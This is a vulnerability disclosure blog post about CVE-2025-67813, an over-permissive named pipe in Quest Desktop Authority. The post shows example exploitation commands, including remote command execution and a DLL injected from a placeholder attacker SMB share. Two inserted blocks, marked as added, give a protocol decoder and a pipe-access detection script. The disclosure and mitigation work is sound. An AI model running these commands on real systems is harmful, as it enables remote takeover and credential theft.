Quest Desktop Authority is an enterprise management solution that allows administrators to manage Windows desktops at scale. The product installs an agent service on managed endpoints that runs under the SYSTEM account to facilitate privileged operations. 

During an engagement last year, we stumbled across an interesting named pipe whilst reviewing endpoint management software. The agent exposes a named pipe called ScriptLogic_Server_NamedPipe_9300 (ScriptLogic being the original vendor before Quest’s acquisition) that implements a custom IPC protocol. What caught my attention was the combination of the pipe running as SYSTEM and the rather generous access controls permitting remote authenticated users to connect. 

TL;DR 

  • Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network 
  • The custom MFC CArchive-based IPC protocol supports dangerous operations including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation 
  • Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent 
  • The vulnerability has been assigned CVE-2025-67813 
  • Quest KB article: Quest KACE Desktop Authority Insecure Named Pipe Permissions (CVE-2025-67813) (4381743) 
  • Remediation: Apply vendor patches or restrict network access to the named pipe via firewall rules 

The Named Pipe 

The Desktop Authority server creates a named pipe that can be accessed both locally and remotely. Named pipes on Windows can be accessed over SMB, meaning any authenticated user within the domain can connect to the pipe on remote hosts if its permissions are not set up correctly. The pipe name follows the legacy ScriptLogic naming convention: 

\\.\pipe\ScriptLogic_Server_NamedPipe_9300 

A corresponding client pipe also exists on agent endpoints: 

\\.\pipe\ScriptLogic_Client_NamedPipe_9300 

The client pipe is used by the server to connect to agents and issue tasks, and as we’ll see later, this creates all kinds of attack surface. 

The IPC Protocol 

The protocol is based on the Microsoft Foundation Classes (MFC) CArchive serialization format, which is essentially a length-prefixed binary format with COM VARIANT support for dynamic typing. After some reversing, I mapped out the message structure: 

class SLPipeMessage { 
    string ProgId;           // COM ProgID to instantiate 
    string Method;           // Method to invoke 
    string RpcName;          // Operation selector 
    string Command;          // Command to execute 
    int DllInjectPid;        // Target PID for injection 
    // ... additional fields 
} 

The RpcName field acts as the operation selector, determining which action the service will perform. During analysis, I identified several supported operations. 

Dangerous Operations 

AdminExec 

The AdminExec operation allows arbitrary command execution as a local administrator. The Command and CommandArgument fields are passed directly to process creation. This is the most straightforward path to code execution. Simply connect to the pipe and send a message with RpcName set to AdminExec along with your command of choice. 

DllInjection 

For those preferring a more surgical approach, the DllInjection operation injects an arbitrary DLL into a specified process. The DLL path can be a UNC path, meaning you can host a malicious DLL on an SMB share and have the SYSTEM service inject it into any process on the target host. If you don’t know a valid PID, you can simply iterate through likely PID ranges until you find one that works. 

Credentials 

The Credentials operation reveals an interesting implementation detail about how Desktop Authority handles privilege elevation. Rather than running all operations as SYSTEM directly, the product uses a just-in-time administrator pattern. 

A low-privilege domain user account is typically configured for Desktop Authority operations. When privileged actions are required, the service temporarily adds this user to the local Administrators group, generates a token, and then removes the user from the group. The token persists with administrative privileges even after group membership is revoked. 

The Credentials RPC call returns the username and password for this service account in plaintext. This is particularly dangerous for several reasons: 

  • Credential reuse: The same service account is likely used across multiple managed endpoints, meaning a single compromise provides lateral movement opportunities 
  • Domain account exposure: Since this is a domain user, the credentials can be used for authentication against other domain resources 
  • Persistence: Even if the JIT admin pattern limits the window of local admin group membership, having the plaintext credentials allows an attacker to perform their own privilege escalation at will 

ImpersonateAdmin 

The ImpersonateAdmin operation is interesting from a token manipulation perspective. By providing a handle to your current thread, the service will impersonate an administrative token on your behalf. 

InvokeCOM 

The InvokeCOM operation provides a generic mechanism to instantiate and invoke methods on COM objects running within the elevated token context. The service exposes several internal COM classes: 

  • CProcess – Process management 
  • CRegistry – Registry manipulation 
  • CFileSystem – File system operations 
  • CUserTool – User management utilities 
  • CNet – Network operations 
  • CSecurityEditor – Security descriptor manipulation 
  • CPowerManagement – Power state control 
  • CEventLog – Event log access 

Each of these classes provides methods that execute with elevated privileges. 

The Serialization Format 

The protocol is based on MFC’s CArchive serialization format. If you’ve ever reversed MFC applications, the wire format will look familiar – it’s essentially how MFC classes serialize themselves when written to a CArchive stream. 

The string format is a direct match for how CString serializes itself. Strings are length-prefixed with a variable-length encoding that supports both ANSI and Unicode. The 0xfffe marker switches the stream to Unicode mode, mirroring exactly how CString handles wide character serialization in MFC. The variable-length size prefix (a single byte for short strings, expanding to 16-bit or 32-bit for longer strings) is the standard CArchive approach to keeping payloads compact whilst supporting arbitrary lengths. 

VARIANTs are serialized with a 16-bit type discriminator (VT_BSTR, VT_I4, VT_BOOL, etc.) followed by the type-specific payload, again matching how you’d expect COM VARIANT types to be marshaled in an MFC application. 
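As an added example (not code from the original post or from Quest), the following decoder reads the CString encoding described above according to MFC’s AfxReadStringLength rules, so that captured pipe traffic can be pulled apart field by field for analysis. The sample bytes are constructed, and the three fields and their order are illustrative rather than the product’s actual message layout.

```python
import struct

def read_cstring(buf: bytes, off: int = 0):
    """Decode one MFC CArchive-serialised CString at buf[off]; return (text, next_off).
    Length prefix as in AfxReadStringLength: 1 byte, 0xFF -> 16-bit, 0xFF 0xFFFF -> 32-bit;
    0xFF 0xFFFE marks UTF-16 and restarts the prefix. Raises ValueError on truncation."""
    def take(fmt):
        nonlocal off
        size = struct.calcsize(fmt)
        if off + size > len(buf):
            raise ValueError("truncated length prefix at offset %d" % off)
        (value,) = struct.unpack_from(fmt, buf, off)
        off += size
        return value

    char_size = 1
    length = take("<B")
    if length == 0xFF:
        length = take("<H")
        if length == 0xFFFE:          # Unicode marker: re-read the length prefix
            char_size = 2
            length = take("<B")
            if length == 0xFF:
                length = take("<H")
        if length == 0xFFFF:          # 32-bit length follows
            length = take("<I")
    nbytes = length * char_size       # length is in characters, not bytes
    if off + nbytes > len(buf):
        raise ValueError("string body truncated at offset %d" % off)
    raw = buf[off:off + nbytes]
    text = raw.decode("utf-16-le" if char_size == 2 else "latin-1")
    return text, off + nbytes

def read_cstrings(buf: bytes):
    """Decode back-to-back CStrings until the buffer is exhausted."""
    out, off = [], 0
    while off < len(buf):
        text, off = read_cstring(buf, off)
        out.append(text)
    return out

# Constructed sample (not a real pipe capture): three consecutive CStrings.
SAMPLE = (
    b"\x09AdminExec"                                        # ANSI, 1-byte length
    + b"\xff\xfe\xff\x07" + "cmd.exe".encode("utf-16-le")   # Unicode marker, 1-byte length
    + b"\xff" + struct.pack("<H", 300) + b"A" * 300         # ANSI, 16-bit length
)
```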

Exploitation 

Putting this all together, exploitation is straightforward. From any domain-joined machine, connect to the target’s named pipe over SMB and send a crafted message: 

SLAgentTool.exe AdminExec -s target.domain.local -c cmd.exe -a "/c whoami > c:\pwned.txt" 

Or for DLL injection: 

SLAgentTool.exe DllInjection -s target.domain.local -d \\attacker\share\payload.dll -p 1234 

The tool handles the connection, serialization, and response parsing automatically. 

Disclosure 

The vulnerability was reported to Quest through their security disclosure process. CVE-2025-67813 has been assigned for tracking purposes. A detailed overview of the disclosure process has been provided below. 

Mitigations 

If patching is not immediately possible, consider the following mitigations: 

  1. Firewall rules: Block inbound SMB (TCP 445) to hosts running the Desktop Authority agent from untrusted network segments 
  2. Network segmentation: Isolate management infrastructure from general user networks 
  3. Disable the service: If Desktop Authority functionality is not required on specific endpoints, disable the agent service 
  4. Monitor pipe access: Implement detection for unusual named pipe connections to ScriptLogic pipes 
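For the pipe-monitoring mitigation, an added example (not from the original post or Quest): triage logic over Windows Security event 5145 (Detailed File Share) records, which, once “Audit Detailed File Share” is enabled, log remote named pipe opens through IPC$ together with the source address and account. The records and the management-server allowlist address are constructed assumptions standing in for parsed log entries.

```python
# Triage Windows Security event 5145 records (Detailed File Share auditing) for
# remote opens of the Desktop Authority pipes via IPC$. Records are constructed
# dicts keyed by the event's own field names, standing in for parsed log entries.

SCRIPTLOGIC_PIPES = {
    "ScriptLogic_Server_NamedPipe_9300",
    "ScriptLogic_Client_NamedPipe_9300",
}
# Assumed: address(es) of the legitimate Desktop Authority management server.
KNOWN_MANAGEMENT_HOSTS = {"10.10.0.5"}


def is_scriptlogic_pipe_open(ev: dict) -> bool:
    """True when a 5145 record is an open of a ScriptLogic pipe through IPC$."""
    if ev.get("EventID") != 5145:
        return False
    if not ev.get("ShareName", "").upper().endswith("IPC$"):
        return False
    return ev.get("RelativeTargetName", "").lstrip("\\") in SCRIPTLOGIC_PIPES


def triage(events: list) -> list:
    """One alert per ScriptLogic pipe open from a host outside the allowlist."""
    alerts = []
    for ev in events:
        if not is_scriptlogic_pipe_open(ev):
            continue
        if ev.get("IpAddress") in KNOWN_MANAGEMENT_HOSTS:
            continue  # expected management traffic
        alerts.append({
            "host": ev.get("Computer"),
            "source_ip": ev.get("IpAddress"),
            "user": ev.get("SubjectDomainName", "") + "\\" + ev.get("SubjectUserName", ""),
            "pipe": ev["RelativeTargetName"].lstrip("\\"),
        })
    return alerts


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 5145, "Computer": "WS01", "ShareName": "\\\\*\\IPC$", "IpAddress": "10.10.0.5",
     "RelativeTargetName": "ScriptLogic_Server_NamedPipe_9300", "SubjectDomainName": "CORP", "SubjectUserName": "svc_da"},
    {"EventID": 5145, "Computer": "WS01", "ShareName": "\\\\*\\IPC$", "IpAddress": "10.10.7.42",
     "RelativeTargetName": "ScriptLogic_Server_NamedPipe_9300", "SubjectDomainName": "CORP", "SubjectUserName": "jsmith"},
    {"EventID": 5145, "Computer": "WS01", "ShareName": "\\\\*\\IPC$", "IpAddress": "10.10.7.42",
     "RelativeTargetName": "srvsvc", "SubjectDomainName": "CORP", "SubjectUserName": "jsmith"},
    {"EventID": 5140, "Computer": "WS01", "ShareName": "\\\\*\\IPC$", "IpAddress": "10.10.7.42",
     "SubjectDomainName": "CORP", "SubjectUserName": "jsmith"},
]
```

Only the open from the unlisted workstation surfaces; the management server’s own connection and unrelated IPC$ pipes such as srvsvc are filtered out.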

Tooling 

To allow time for organisations to apply patches, the exploit tool will not be released at this time. 

The tool supports the following operations: 

  • AdminExec – Execute arbitrary commands 
  • Credentials – Retrieve stored credentials 
  • InvokeCOM – Invoke arbitrary COM methods 
  • COMExec – Shortcut for CProcess.Exec 

Disclosure Timeline 

April 11, 2024
Initial disclosure, case number assigned and request for the latest version

April 14, 2024
Confirmation sent that the latest version is vulnerable and PoC sent to Quest

April 22, 2024
Case handed over to the development team

May 12, 2024
Contact from developers, where the various RPC command vulnerabilities were described to Quest

May 27, 2024
Request for an estimated fix date

June 18, 2024
Another request for a fix date, mentioning our 90-day disclosure policy

June 20, 2024
Contact from the Desktop Authority program manager confirming the vulnerabilities, but no fix date provided

June 23, 2024
Informed Quest we are happy to wait longer provided we are kept up to date

July 22, 2024
Email indicating the fix is still in progress but no date available for the fix

August 13, 2024
Planned release in Q3 2024 communicated by Quest

August 22, 2024
QA version provided and confirmed that the exploit code no longer works

September 12, 2024
Requested a CVE ID and told the new CVE will be registered at the time of release

October 7, 2024
Quest informed us that a CVE had been requested

November 10, 2024
Desktop Authority 11.3.2 released but no CVE provided yet

December 17, 2024
Follow-up request made for the assigned CVE

January 5, 2025
Quest confirmed they have finally received a CVE and will be releasing a knowledge base article soon

January 12, 2025
KB article link and CVE provided by Quest. Informed Quest that the local attack vector is incorrect and that the medium risk rating is therefore not representative of the true risk. The KB article was updated to high, but still with a local attack vector.

February 1, 2026
Blog published